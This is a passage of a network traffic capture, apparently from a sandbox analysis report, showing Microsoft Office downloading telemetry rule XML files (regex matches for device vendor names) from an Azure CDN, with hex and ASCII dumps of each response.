                                              Content-Type: text/xml
                                              Content-Length: 427
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                              ETag: "0x8DC582BA909FA21"
                                              x-ms-request-id: 488bf4d4-001e-00a2-2656-26d4d5000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134558Z-17c5cb586f6w4mfs5xcmnrny6n00000002500000000041nm
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:59 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              57192.168.2.44980413.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:59 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:59 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:59 GMT
                                              Content-Type: text/xml
                                              Content-Length: 486
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                              ETag: "0x8DC582B92FCB436"
                                              x-ms-request-id: 9d552454-801e-0083-275a-26f0ae000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134559Z-17c5cb586f6hhlf5mrwgq3erx800000001mg00000000a7fz
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:59 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              58192.168.2.44980113.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:59 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:59 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:59 GMT
                                              Content-Type: text/xml
                                              Content-Length: 472
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                              ETag: "0x8DC582B9D43097E"
                                              x-ms-request-id: 1f9c3bb8-d01e-0014-220b-22ed58000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134559Z-16849878b78nx5sne3fztmu6xc00000001ng0000000068b1
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:59 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              59192.168.2.44980513.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:59 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:59 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:59 GMT
                                              Content-Type: text/xml
                                              Content-Length: 423
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                              ETag: "0x8DC582BB7564CE8"
                                              x-ms-request-id: efc778c0-f01e-0052-4de5-219224000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134559Z-16849878b78lhh9t0fb3392enw000000092g00000000m5v0
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:59 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              60192.168.2.44980713.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:59 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:59 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:59 GMT
                                              Content-Type: text/xml
                                              Content-Length: 404
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                              ETag: "0x8DC582B95C61A3C"
                                              x-ms-request-id: 2897d81f-501e-005b-6528-26d7f7000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134559Z-17c5cb586f6hp4zfqskwhb6z3000000002h000000000bbex
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:59 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              61192.168.2.44980613.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:59 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:59 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:59 GMT
                                              Content-Type: text/xml
                                              Content-Length: 478
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                              ETag: "0x8DC582B9B233827"
                                              x-ms-request-id: 11ec9ee4-a01e-0053-158c-268603000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134559Z-17c5cb586f6tzc2wdxudxz0zw8000000025000000000eetq
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:59 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              62192.168.2.44980813.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:59 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:00 UTC491INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:59 GMT
                                              Content-Type: text/xml
                                              Content-Length: 468
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                              ETag: "0x8DC582BB046B576"
                                              x-ms-request-id: 0ce3105a-501e-0029-7cd2-26d0b8000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134559Z-16849878b78wv88bk51myq5vxc00000000zg000000001h5e
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              X-Cache-Info: L1_T2
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:00 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              63192.168.2.44980913.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:59 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:00 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:00 GMT
                                              Content-Type: text/xml
                                              Content-Length: 400
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                              ETag: "0x8DC582BB2D62837"
                                              x-ms-request-id: a96fbf53-401e-0016-5d5d-2653e0000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134600Z-16849878b78fmrkt2ukpvh9wh4000000098g000000009ryn
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:00 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              64192.168.2.44981013.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:59 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:00 UTC491INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:00 GMT
                                              Content-Type: text/xml
                                              Content-Length: 479
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                              ETag: "0x8DC582BB7D702D0"
                                              x-ms-request-id: de733a63-101e-00a2-1415-269f2e000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134600Z-17c5cb586f67hhlz1ecw6yxtp000000002yg0000000071ye
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache-Info: L1_T2
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:00 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              65192.168.2.44981113.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:00 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:00 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:00 GMT
                                              Content-Type: text/xml
                                              Content-Length: 425
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                              ETag: "0x8DC582BBA25094F"
                                              x-ms-request-id: 24b9edea-d01e-002b-4c3d-2625fb000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134600Z-17c5cb586f6gkqkwd0x1ge8t0400000000x0000000006qw1
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:00 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              66192.168.2.44981213.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:00 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:00 UTC491INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:00 GMT
                                              Content-Type: text/xml
                                              Content-Length: 475
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                              ETag: "0x8DC582BB2BE84FD"
                                              x-ms-request-id: 99f07890-301e-0051-29d2-2538bb000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134600Z-16849878b785jrf8dn0d2rczaw00000001ug000000005gtw
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache-Info: L1_T2
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:00 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              67192.168.2.44981313.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:00 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:00 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:00 GMT
                                              Content-Type: text/xml
                                              Content-Length: 448
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                              ETag: "0x8DC582BB389F49B"
                                              x-ms-request-id: 43d08777-c01e-0014-2856-26a6a3000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134600Z-17c5cb586f6hhlf5mrwgq3erx800000001p0000000007hxq
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
